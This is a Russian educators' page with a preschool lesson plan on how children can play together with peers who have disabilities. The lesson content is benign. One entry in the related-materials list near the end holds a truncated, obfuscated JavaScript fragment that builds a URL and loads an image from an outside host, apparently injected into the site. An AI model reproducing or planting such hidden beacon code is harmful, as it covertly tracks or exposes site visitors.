Беседа "Давай дружить!"
методическая разработка по коррекционной педагогике (старшая группа)

Цель : формировать у детей умение осуществлять совместную игровую деятельность с детьми с ОВЗ.

Задачи :

- знакомить с особенностями игровой деятельности детей с ОВЗ;

- формировать у детей практические навыки выбора игры в соответствии с особенностями здоровья партнера по игре.

Тип занятия : беседа. 

Скачать:

ВложениеРазмер
Файл beseda_-_davay_druzhit.docx15.84 КБ

Предварительный просмотр:

«Давай дружить!»

Цель : формировать у детей умение осуществлять совместную игровую деятельность с детьми с ОВЗ.

Задачи :

- знакомить с особенностями игровой деятельности детей с ОВЗ;

- формировать у детей практические навыки выбора игры в соответствии с особенностями здоровья партнера по игре.

Тип занятия : беседа.

Форма работы обучающихся: групповое обсуждение, мозговой штурм (брейнсторм), игра.

Перечень необходимого оборудования: компьютер, проектор, видеозапись мультфильма по сказке Валентина Катаева «Цветик-семицветик», доска, мел, клубок шерстяных ниток.

Ход урока.

Вводный этап

Дети сидят на стульях, расставленных по кругу.

1. Беседа об играх.

Детям предлагается ответить на вопросы:

- Вспомните игры, в которые можно играть дома, во дворе, на переменах?

- Для чего нужны игры?

2. Просмотр и обсуждение отрывка из мультфильма «Цветик-семицветик» о знакомстве девочки Жени и мальчика Вити.

Вопросы для обсуждения:

- Что предложила Женя Вите?

- Почему Витя не побегать с Женей?

- Было ли Желание у Вити поиграть с Женей?

- В какие игры они бы смогли поиграть?

Педагог подводит детей к формулированию вывода: Всем детям вне зависимости от особенностей их здоровья хочется играть и быть вместе с другими детьми.

Основной этап.

2. Беседа об играх, в которые можно играть с детьми с ОВЗ.

Воспитатель обращает внимание детей на то, что, играя с ребятами, имеющими ОВЗ следует подобрать ту игру, которая будет учитывать их особенности.

Если это ребенок с нарушение зрения, то нужно при выборе инвентаря должна использоваться озвученная атрибутика (колокольчик, погремушки, бубен, озвученный мяч, свисток и прочее), если в игре используется мяч, то он должен быть очень ровным и немного тяжелее волейбольного, потому что тяжелый мяч лучше ощущается слепыми детьми. Для слабовидящих детей или с остаточным зрением следует подобрать яркий и красочный инвентарь, и при этом также учитывается контрастность предметов: используются оранжевый, зеленый, красный и желтый цвета. Определить с границы и размеры игровой площадки, установить ограничительные ориентиры (линии из травяного покрова или из гравия, канавки, засыпанные песком, резиновые коврики, асфальтированные дорожки и прочее). Выбрать для игры ровное место без кустарников, пней, камней.

Обращает внимание детей на необходимость предупреждать об опасности, ориентировать играющих, задавать нужное направление при помощи того или иного сигнала (например, с помощью свистка).

3. Показ презентации «Что такое доброта».

Заключительный этап .

4. Игра «Волшебный клубочек».

Дети садятся в круг, воспитатель предлагает, передавая друг другу клубок шерстяных ниток и наматывая часть нитки на запястье, рассказать о том, что он сегодня узнал и какие выводы для себя сделал.

Педагог подводит детей к формулированию вывода о том, что для того, чтобы вместе проводить время, играть не существует преград. Нужно только подумать о том, что будет интересно делать вместе.


По теме: методические разработки, презентации и конспекты

Проект «C туризмом дружит вся семья» (старший дошкольный возраст)

Цель проекта: Привлечение детей и родителей к активному отдыху, спорту....

Если хочешь долго жить - научись с огнем дружить!

Развлечение по правилам пожарной безопасности, со сказкой-драматизацией и стихами противопожарного содержания. Старший дошкольный возраст....

Реализация ФГТ В ГДОУ. Занятие "Давайте дружить"

Цель: Создание условий для естественного психологического развития ребенка. Задачи: *Развитие эмоцианальной сферы. введение ребенка в мир человеческих эмоций. *развитие коммуникативных уме...

Конспект занятия "Давайте дружить"

Конспект занятия по развитию речи в 1 младшей группе....

Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».

Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД  во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...

Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...

Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»

Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...